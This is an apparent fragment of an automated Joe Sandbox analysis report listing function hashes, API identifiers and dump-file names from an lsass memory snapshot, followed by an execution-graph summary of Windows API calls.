                                                                      • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                                      • Instruction Fuzzy Hash: C1517B3625475187E726DF1BA840A9AB3A5F78CBA4F604159DF4E43B64DF38CC05CB81
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                                      • Instruction ID: 8dccc9c4f5f39d0e34916fbd10d3c21f5b49362c2f510ebc6df5edcc525ea595
                                                                      • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                                      • Instruction Fuzzy Hash: 9C61C636169B80C7EB619B16E45035AB7A0F7887A4F601515EF8D47BB8DB7CC940CB82
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID:
                                                                      • API String ID: 1092925422-0
                                                                      • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                                      • Instruction ID: 8a0e5b0f67ac1fd3911e5056b2041752d295a4b6fb88322e2f22780a5f38df01
                                                                      • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                                      • Instruction Fuzzy Hash: 0E112B36645B8093FB25AB22F40429AB7B0FB89BA4F240026DF4D037A4EB7DC954C7C5
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 2395640692-1018135373
                                                                      • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction ID: fb5645df35e5793d6f54a435d13ca8e0709b8659f49037beec15e52e7964ba14
                                                                      • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction Fuzzy Hash: 0F51C232351B008AEB56CB17E444BAC7795F758BA8F648121DF5E477A8DB78CC41C781
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction ID: c3c23e5d1b0181fecbc540254143a6f72f2c96a49833f9bacf731b9653e35848
                                                                      • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction Fuzzy Hash: 1661AE72508BC485EB229F16E4407DAB7A0F789BA8F244215EFDC17BA9DB7CC590CB41
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction ID: 50b6b12fb3c5c38d0d014a028751acb205327d0ac3488ffe82a985e9a0789cdd
                                                                      • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction Fuzzy Hash: 09518E322807808BEB768F2795443A87BA5F359BA4F244156DF9D47BE5CB38CC50DB82
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000003.2361554206.00000140ADFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_3_140adfc0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction ID: b429d8d9711aa915d0cbba5ed322443bdaf93f6d3e30e52ad55a1ee148141c96
                                                                      • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction Fuzzy Hash: A751D1322607888BEB758F13A1443DA77A3FB58B85F284116DB8943BE5CB38D572E701
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID: pid_
                                                                      • API String ID: 517849248-4147670505
                                                                      • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                                      • Instruction ID: 9347d474d0b91fa265e04d2213d3bbcfc5162b1de3d0b922ac8d9747152185f9
                                                                      • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                                      • Instruction Fuzzy Hash: 8F114F31394B8191EB129B26E8003DA62A4FB9C7A5FB440259F4D836B5EF78CD45C781
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                                      • Instruction ID: f44c40dc46d8a14717a7e28ec3dd61239b269cd74b9e3fc11d7840f94af7ebb8
                                                                      • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                                      • Instruction Fuzzy Hash: 2CD1F172754B8489E712CFAAD4403DC37B1F358BA8F604216DF5EA7BA9DA34C946C381
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                                      • Instruction ID: a7db99b5f4592933ab9d9fcefbd2ed102edd81d2e3ef44bf4708692969ef0819
                                                                      • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                                      • Instruction Fuzzy Hash: 9B016532650B80DAE715EF67E84428977A2FB8CFA1B294025DF4D43B28DF38D891C780
                                                                      APIs
                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000140AE8728DF), ref: 00000140AE872A12
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleMode
                                                                      • String ID:
                                                                      • API String ID: 4145635619-0
                                                                      • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                                      • Instruction ID: 2e7cc4aa3ae94b300f4e6f0257f7cb7749ed6200f60573b19eace599f31e8f8f
                                                                      • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                                      • Instruction Fuzzy Hash: 2F9105B265075089FB62DF6B94507ED7BA0F35CBA8F740106DF4E53AA5DA34C885C382
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                                      • Instruction ID: 731bc0d5581eed0fb4cdda9989d7511de2973ec687fe859b23836854cee0570e
                                                                      • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                                      • Instruction Fuzzy Hash: 47111536790F048AEB00DB61E8653A833A4F71D768FA40E21EF6D877A4DB78C594C381
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000003.2361554206.00000140ADFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_3_140adfc0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 3242871069-1018135373
                                                                      • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction ID: 6dacf682604195edeba7ac8c828718cd55442e591f5eab81f157a09630ef0931
                                                                      • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction Fuzzy Hash: 1651B232321B049BDB96CF17E448BEA3393FB48B98F2541259F46477A8D779D862D700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000003.2361554206.00000140ADFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_3_140adfc0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction ID: 8fa38b0c882aa4e2cae7ad3da0de34cfcaff7e5919ca05456c99c896e0efe0af
                                                                      • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction Fuzzy Hash: CA61A272514BC882D772DF16E4407DBB7A2FB89B89F144215EBD817BA5DB78C1A1CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                                      • Instruction ID: 3c00e9618906587114cfc692b6afa461ad58df83ebc395dc250c9046a1c9e208
                                                                      • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                                      • Instruction Fuzzy Hash: 4851033628878085EA26DF2BA4547EAA751F38DBA0F740065CF4D47BB9DA39CC00C7C2
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                                      • Instruction ID: 255177383648f2894fd213fbe0e6a3e54ca119f5ec3950ae9442bb96d1f83806
                                                                      • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                                      • Instruction Fuzzy Hash: F341C572625B8086EB51DF2AE4447D9B7A0F35C7E4FA04122EF4D87B68EB38C841C781
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                                      • Instruction ID: 94200fb60f2d996550029215fd4c3d66a2994c5ef294e7576bee1024df5c8f56
                                                                      • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                                      • Instruction Fuzzy Hash: 8011FE32214B4082EB618B16F44429977E5FB88B94F784625EF8D07BA8DF3CC951CB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                                      • Instruction ID: e0bc7f7aa60f32e668b10b12c28b3508dd04559eb20fa7f90dfc6dcf09de169f
                                                                      • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                                      • Instruction Fuzzy Hash: D1115B21A51B8085EB16DB67A80429977A2FB8CFE1F684124DF8E53775EF38D842C380
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                                      • Instruction ID: 5b7257912215da22affbcc8466b9813032a90c587412cbc9cb6543fde445ccf3
                                                                      • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                                      • Instruction Fuzzy Hash: 25E039316416049AE715AB63D84838936E2EB8CB26F648024CE0907360EF7D9899C7A1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                                      • Instruction ID: 6ab3dc22cfb29883a2d21ca8a70a6b2bde87891e4e8d1950b5fb491c92a906b3
                                                                      • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                                      • Instruction Fuzzy Hash: A1E0ED716516049AE719AB63D84429977E2FF8CB26F648024CE0907720EE389899D661

                                                                      Execution Graph

                                                                      Execution Coverage:0.8%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:120
                                                                      Total number of Limit Nodes:9
                                                                      execution_graph 15156 195dd5c1e3c LoadLibraryA GetProcAddress 15157 195dd5c1e62 SleepEx 15156->15157 15158 195dd5c1e6f 15156->15158 15157->15157 14973 195de1ad220 14978 195de1ad231 __std_exception_copy 14973->14978 14974 195de1ad282 14983 195de1ad1f4 14974->14983 14975 195de1ad266 HeapAlloc 14977 195de1ad280 14975->14977 14975->14978 14978->14974 14978->14975 14980 195de1ab470 14978->14980 14986 195de1ab4c0 14980->14986 14992 195de1acb10 14983->14992 14991 195de1ac558 EnterCriticalSection 14986->14991 14993 195de1acb59 GetLastError 14992->14993 14995 195de1acb2f __std_exception_copy 14992->14995 14994 195de1acb6c 14993->14994 14997 195de1acb8a SetLastError 14994->14997 14998 195de1acb87 14994->14998 15000 195de1ac940 __std_exception_copy 11 API calls 14994->15000 14996 195de1acb54 14995->14996 15001 195de1ac940 GetLastError 14995->15001 14996->14977 14997->14996 14998->14997 15000->14998 15002 195de1ac966 15001->15002 15003 195de1ac96c SetLastError 15002->15003 15019 195de1ad220 15002->15019 15004 195de1ac9e5 15003->15004 15004->14996 15007 195de1ac9a5 FlsSetValue 15010 195de1ac9b1 FlsSetValue 15007->15010 15011 195de1ac9c8 15007->15011 15008 195de1ac995 FlsSetValue 15026 195de1ad2a0 15008->15026 15012 195de1ad2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 15010->15012 15032 195de1ac758 15011->15032 15018 195de1ac9c6 SetLastError 15012->15018 15018->15004 15024 195de1ad231 __std_exception_copy 15019->15024 15020 195de1ad282 15022 195de1ad1f4 __std_exception_copy 12 API calls 15020->15022 15021 195de1ad266 HeapAlloc 15023 195de1ac987 15021->15023 15021->15024 15022->15023 15023->15007 15023->15008 15024->15020 15024->15021 15025 195de1ab470 __std_exception_copy 2 API calls 15024->15025 15025->15024 15027 195de1ad2a5 HeapFree 15026->15027 15028 195de1ac9a3 15026->15028 15027->15028 15029 195de1ad2c0 GetLastError 15027->15029 15028->15003 15030 195de1ad2cd Concurrency::details::SchedulerProxy::DeleteThis 15029->15030 